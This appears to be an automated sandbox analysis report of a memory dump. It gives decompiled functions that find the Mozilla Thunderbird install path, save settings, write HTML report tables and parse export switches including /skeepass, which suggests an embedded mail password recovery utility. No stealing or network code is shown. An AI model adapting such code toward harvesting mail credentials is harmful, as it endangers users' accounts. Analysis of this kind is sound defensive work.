0x0040f453
0x0040f459
0x0040f46b
0x0040f471
0x0040f484
0x0040f486
0x0040f48b
0x0040f490
0x0040f5e6
0x0040f5ee
0x0040f5f7
0x0040f600
0x0040f60e
0x0040f610
0x0040f610
0x0040f614
0x0040f616
0x0040f623
0x0040f625
0x0040f625
0x0040f629
0x0040f62d
0x0040f63b
0x0040f63d
0x0040f63d
0x0040f63b
0x0040f629
0x0040f614
0x0040f64a
0x0040f496
0x0040f4a3
0x0040f4a9
0x0040f4b9
0x0040f4bc
0x0040f4c1
0x0040f5d5
0x0040f4c9
0x0040f4cb
0x0040f4d1
0x0040f4d6
0x0040f4d7
0x0040f4dc
0x0040f4e1
0x0040f4f0
0x0040f4f6
0x0040f508
0x0040f50e
0x0040f519
0x0040f51a
0x0040f525
0x0040f52a
0x0040f52b
0x0040f547
0x0040f54c
0x0040f552
0x0040f554
0x0040f555
0x0040f55a
0x0040f55f
0x0040f561
0x0040f561
0x0040f569
0x0040f581
0x0040f582
0x0040f589
0x0040f591
0x0040f592
0x0040f5a2
0x0040f5b5
0x0040f5ba
0x0040f5ba
0x0040f592
0x0040f569
0x0040f5bd
0x0040f5cd
0x0040f5d2
0x0040f5d2
0x0040f5e0
0x00000000
0x0040f5e0

APIs

memset.MSVCRT ref: 0040F459
memset.MSVCRT ref: 0040F471

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

memset.MSVCRT ref: 0040F4A9

Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28

_mbsnbicmp.MSVCRT ref: 0040F4D7
memset.MSVCRT ref: 0040F4F6
memset.MSVCRT ref: 0040F50E
_snprintf.MSVCRT ref: 0040F52B
_mbsrchr.MSVCRT ref: 0040F555
_mbsicmp.MSVCRT ref: 0040F589
strcpy.MSVCRT(?,?,?), ref: 0040F5A2
strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D

Strings

%s\bin, xrefs: 0040F51A
mozilla, xrefs: 0040F4D1
PathToExe, xrefs: 0040F538
SOFTWARE\Mozilla, xrefs: 0040F47A
%programfiles%\Mozilla Thunderbird, xrefs: 0040F5FB

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
API String ID: 3269028891-3267283505
Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040F126, Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040F126(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}

0x0040f126
0x0040f141
0x0040f147
0x0040f155
0x0040f15b
0x0040f160
0x0040f167
0x0040f16e
0x0040f175
0x0040f175
0x0040f17b
0x0040f17e
0x0040f180
0x0040f188
0x0040f18d
0x0040f194
0x0040f1a3
0x0040f1b0
0x0040f1b5
0x0040f1b5
0x0040f1b8
0x0040f1be
0x0040f1da
0x0040f1e7
0x0040f1ec
0x0040f1f5
0x0040f1fb
0x0040f1ff
0x0040f207
0x0040f20d
0x0040f212
0x0040f21c
0x0040f224
0x0040f22a
0x0040f22e
0x0040f236
0x0040f23c
0x0040f242

APIs

memset.MSVCRT ref: 0040F147
memset.MSVCRT ref: 0040F15B
strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
sprintf.MSVCRT ref: 0040F1A3
strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
sprintf.MSVCRT ref: 0040F1DA
strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236

Strings

<font, xrefs: 0040F182
</font>, xrefs: 0040F230
<b>, xrefs: 0040F201
size="%d", xrefs: 0040F19D
color="#%s", xrefs: 0040F1D4
</b>, xrefs: 0040F21E

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcat$memsetsprintf$strcpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 1662040868-1996832678
Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF17, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AF17(void* __eax, intOrPtr _a4) {
				char _v271;
				char _v532;
				intOrPtr _v536;
				char _v540;
				void _v803;
				char _v804;
				void* __ebx;
				void* __edi;
				char* _t47;
				intOrPtr _t67;
				WINDOWPLACEMENT* _t73;
				void* _t75;
				char* _t83;
				struct HWND__* _t84;
				intOrPtr _t88;
				int _t90;

				_t75 = __eax;
				_v804 = 0;
				memset( &_v803, 0, 0x104);
				GetModuleFileNameA(0,  &_v804, 0x104);
				_t47 = strrchr( &_v804, 0x2e);
				if(_t47 != 0) {
					 *_t47 = 0;
				}
				strcat( &_v804, ".cfg");
				_v536 = _a4;
				_v540 = 0x413bdc;
				_v532 = 0;
				_v271 = 0;
				strcpy( &_v532,  &_v804);
				strcpy( &_v271, "General");
				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
				_t67 = _v536;
				_a4 = _t67;
				_t90 = 0x2c;
				if(_t67 != 0) {
					_t84 =  *(_t75 + 0x108);
					if(_t84 != 0) {
						_t73 = _t75 + 0x128;
						_t73->length = _t90;
						GetWindowPlacement(_t84, _t73);
					}
				}
				_t83 =  &_v540;
				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
				if(_a4 == 0) {
					E00401896(_t75);
				}
				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
			}

0x0040af29
0x0040af35
0x0040af3c
0x0040af4d
0x0040af5c
0x0040af65
0x0040af67
0x0040af67
0x0040af76
0x0040af7e
0x0040af92
0x0040af9c
0x0040afa3
0x0040afaa
0x0040afbb
0x0040afc0
0x0040afdf
0x0040aff8
0x0040b011
0x0040b02a
0x0040b02d
0x0040b037
0x0040b03a
0x0040b03b
0x0040b03d
0x0040b045
0x0040b047
0x0040b04f
0x0040b051
0x0040b051
0x0040b045
0x0040b06a
0x0040b070
0x0040b076
0x0040b078
0x0040b078
0x0040b092

APIs

memset.MSVCRT ref: 0040AF3C
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
strrchr.MSVCRT ref: 0040AF5C
strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
GetWindowPlacement.USER32(?,?), ref: 0040B051

Strings

General, xrefs: 0040AFB5
0@, xrefs: 0040AF92
AddExportHeaderLine, xrefs: 0040B006
ShowGridLines, xrefs: 0040AFD4
.cfg, xrefs: 0040AF70
WinPos, xrefs: 0040B065
SaveFilterIndex, xrefs: 0040AFED
MarkOddEvenRows, xrefs: 0040B01F

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
API String ID: 1301239246-2014360536
Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409482, Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F071(_v28,  &_v184);
						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F071(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405EFD(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405EFD(_a4, "</table><p>");
				return E00405EFD(_a4, 0x412b1c);
			}

0x00409482
0x0040949b
0x004094a2
0x004094a9
0x004094b5
0x004094b7
0x004094ba
0x004094c1
0x004094c5
0x004094d4
0x004094db
0x004094e7
0x004094eb
0x004094f2
0x004094f7
0x00409503
0x00409506
0x0040951f
0x00409524
0x00409524
0x0040952f
0x00409539
0x0040953c
0x00409546
0x0040954c
0x0040955b
0x00409566
0x0040956c
0x0040956f
0x00409573
0x00409577
0x0040957f
0x00409582
0x0040958d
0x0040959a
0x004095ae
0x004095bc
0x004095c3
0x004095c6
0x004095cc
0x00409601
0x004095ce
0x004095d1
0x004095e4
0x004095ed
0x004095f2
0x004095f2
0x00409608
0x0040960b
0x0040960f
0x0040961c
0x00409622
0x0040962c
0x00409650
0x0040965b
0x00409660
0x00409663
0x0040966c
0x00000000
0x00000000
0x00409544
0x00409544
0x00409546
0x00409672
0x0040967a
0x00409692

APIs

memset.MSVCRT ref: 004094A2
memset.MSVCRT ref: 004094C5
memset.MSVCRT ref: 004094DB
memset.MSVCRT ref: 004094EB
sprintf.MSVCRT ref: 0040951F
strcpy.MSVCRT(00000000, nowrap), ref: 00409566
sprintf.MSVCRT ref: 004095ED
strcat.MSVCRT(?, ), ref: 0040961C

Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090

strcpy.MSVCRT(?,?), ref: 00409601
sprintf.MSVCRT ref: 00409650

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mt,00000000,?,?,004092ED,00000001,00412B1C,74E04DE0), ref: 00405F17

Strings

<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 004094AA
 , xrefs: 00409616
bgcolor="%s", xrefs: 00409519
<font color="%s">%s</font>, xrefs: 004095E5
nowrap, xrefs: 00409560
<table border="1" cellpadding="5">, xrefs: 00409527
</table><p>, xrefs: 00409672

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 2822972341-601624466
Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00409EC4, Relevance: 25.6, APIs: 17, Instructions: 108
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00409EC4(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_v40 = _t26;
				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
				DeleteObject(_v56);
				DeleteObject(_t42);
				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}

0x00409ec7
0x00409ed5
0x00409edf
0x00409ee5
0x00409ef1
0x00409ef6
0x00409efc
0x00409f11
0x00409f11
0x00409f1a
0x00409f26
0x00409f2b
0x00409f31
0x00409f46
0x00409f46
0x00409f52
0x00409f57
0x00409f5d
0x00409f93
0x00409f97
0x00409fa1
0x00409fa3
0x00409fa7
0x00409fb8
0x00409fc2
0x00409fcf
0x00409fdb
0x00409fde
0x0040a004

APIs

ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
SendMessageA.USER32(?,00001003,00000001,?), ref: 00409F11
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
SendMessageA.USER32(?,00001003,00000000,?), ref: 00409F46
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
LoadImageA.USER32 ref: 00409F7B
LoadImageA.USER32 ref: 00409F97
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
GetSysColor.USER32(0000000F), ref: 00409FA7
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
DeleteObject.GDI32(?), ref: 00409FDB
DeleteObject.GDI32(00000000), ref: 00409FDE
SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409FFC

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
String ID:
API String ID: 3411798969-0
Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040B841, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040B841(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L004115B2();
				if(__eax != 0) {
					_push("/sverhtml");
					L004115B2();
					if(__eax != 0) {
						_push("/sxml");
						L004115B2();
						if(__eax != 0) {
							_push("/stab");
							L004115B2();
							if(__eax != 0) {
								_push("/scomma");
								L004115B2();
								if(__eax != 0) {
									_push("/stabular");
									L004115B2();
									if(__eax != 0) {
										_push("/skeepass");
										L004115C4();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}

0x0040b842
0x0040b847
0x0040b850
0x0040b857
0x0040b85c
0x0040b865
0x0040b86c
0x0040b871
0x0040b87a
0x0040b881
0x0040b886
0x0040b88f
0x0040b896
0x0040b89b
0x0040b8a4
0x0040b8ab
0x0040b8b0
0x0040b8b9
0x0040b8c0
0x0040b8c5
0x0040b8cc
0x0040b8d6
0x0040b8bb
0x0040b8bd
0x0040b8be
0x0040b8be
0x0040b8a6
0x0040b8a8
0x0040b8a9
0x0040b8a9
0x0040b891
0x0040b893
0x0040b894
0x0040b894
0x0040b87c
0x0040b87e
0x0040b87f
0x0040b87f
0x0040b867
0x0040b869
0x0040b86a
0x0040b86a
0x0040b852
0x0040b854
0x0040b855
0x0040b855

APIs

_stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
_stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C

Strings

/shtml, xrefs: 0040B842
/scomma, xrefs: 0040B896
/sxml, xrefs: 0040B86C
/stabular, xrefs: 0040B8AB
/skeepass, xrefs: 0040B8C0
/stab, xrefs: 0040B881
/sverhtml, xrefs: 0040B857

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _stricmp
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 2884411883-1959339147
Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F243, Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void _v771;
				char _v772;
				void _v1027;
				char _v1028;
				char _v1284;
				char _v2308;
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405EFD(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;
					_a16 = _t47;
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405EFD(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;
						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}

0x0040f25e
0x0040f264
0x0040f272
0x0040f278
0x0040f286
0x0040f28c
0x0040f291
0x0040f298
0x0040f2b6
0x0040f2bb
0x0040f2bb
0x0040f2c2
0x0040f2e0
0x0040f2f1
0x0040f2f6
0x0040f2f6
0x0040f30c
0x0040f31b
0x0040f320
0x0040f323
0x0040f328
0x0040f332
0x0040f335
0x0040f338
0x0040f341
0x0040f347
0x0040f34c
0x0040f34e
0x0040f353
0x0040f36c
0x0040f355
0x0040f362
0x0040f367
0x0040f367
0x0040f396
0x0040f3a5
0x0040f3aa
0x0040f3ad
0x0040f3b0
0x0040f3b0
0x0040f3b0
0x00000000
0x0040f3b5
0x0040f3b9

APIs

memset.MSVCRT ref: 0040F264
memset.MSVCRT ref: 0040F278
memset.MSVCRT ref: 0040F28C
sprintf.MSVCRT ref: 0040F2B6
sprintf.MSVCRT ref: 0040F2E0
strcpy.MSVCRT(?,</font>,?,<font color="%s">,00000000,000000FF,?,?,?,?,?,?,?,?,?,00000006), ref: 0040F2F1
sprintf.MSVCRT ref: 0040F30C
memset.MSVCRT ref: 0040F347
sprintf.MSVCRT ref: 0040F362
sprintf.MSVCRT ref: 0040F396

Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090

Strings

width="%s", xrefs: 0040F35C
</font>, xrefs: 0040F2EB
<table border="1" cellpadding="5"><tr%s>, xrefs: 0040F306
bgcolor="%s", xrefs: 0040F2B0
<font color="%s">, xrefs: 0040F2DA
<th%s>%s%s%s, xrefs: 0040F390

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: sprintf$memset$strcpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 898937289-3842416460
Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
